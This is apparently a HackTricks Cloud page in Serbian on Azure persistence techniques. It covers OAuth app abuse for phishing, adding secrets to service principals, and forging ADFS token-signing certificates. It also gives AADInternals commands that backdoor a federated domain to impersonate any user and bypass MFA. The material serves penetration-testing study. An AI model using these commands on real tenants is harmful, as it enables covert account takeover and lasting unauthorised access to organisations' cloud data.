Az - Persistence
Reading time: 3 minutes
tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.
OAuth Application
Podrazumevano, svaki korisnik može registrovati aplikaciju u Entra ID. Tako možete registrovati aplikaciju (samo za ciljni tenant) koja zahteva visoke dozvole sa odobrenjem administratora (odobrite je ako ste administrator) - kao što je slanje maila u ime korisnika, upravljanje rolama itd. Ovo će nam omogućiti da izvršimo phishing napade koji bi bili veoma plodonosni u slučaju uspeha.
Pored toga, mogli biste takođe prihvatiti tu aplikaciju sa vašim korisnikom kao način da zadržite pristup nad njom.
Applications and Service Principals
Sa privilegijama Administratora aplikacija, GA ili prilagođenom ulogom sa microsoft.directory/applications/credentials/update dozvolama, možemo dodati akreditive (tajni ključ ili sertifikat) postojećoj aplikaciji.
Moguće je ciljati aplikaciju sa visokim dozvolama ili dodati novu aplikaciju sa visokim dozvolama.
Zanimljiva uloga koju bi trebalo dodati aplikaciji bila bi Uloga privilegovanog administratora za autentifikaciju jer omogućava resetovanje lozinke Globalnim Administratorima.
Ova tehnika takođe omogućava obići MFA.
$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
- Za autentifikaciju zasnovanu na sertifikatima
Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>
Federation - Token Signing Certificate
Sa DA privilegijama na on-prem AD, moguće je kreirati i uvesti nove Token signing i Token Decrypt certifikate koji imaju veoma dugu validnost. Ovo će nam omogućiti da se prijavimo kao bilo koji korisnik čiji ImuutableID znamo.
Pokrenite sledeću komandu kao DA na ADFS serveru(ima) da kreirate nove certifikate (podrazumevani lozinka 'AADInternals'), dodajte ih u ADFS, onemogućite automatsko obnavljanje i restartujte servis:
New-AADIntADFSSelfSignedCertificates
Zatim, ažurirajte informacije o sertifikatu sa Azure AD:
Update-AADIntADFSFederationSettings -Domain cyberranges.io
Federation - Trusted Domain
Sa GA privilegijama na tenant-u, moguće je dodati novu domenu (mora biti verifikovana), konfigurisati njen tip autentifikacije na Federated i konfigurisati domenu da veruje određenom sertifikatu (any.sts u sledećoj komandi) i izdavaču:
# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io
# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID
# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true
Reference
tip
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Učite i vežbajte Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitteru 🐦 @hacktricks_live.
- Podelite hakerske trikove slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.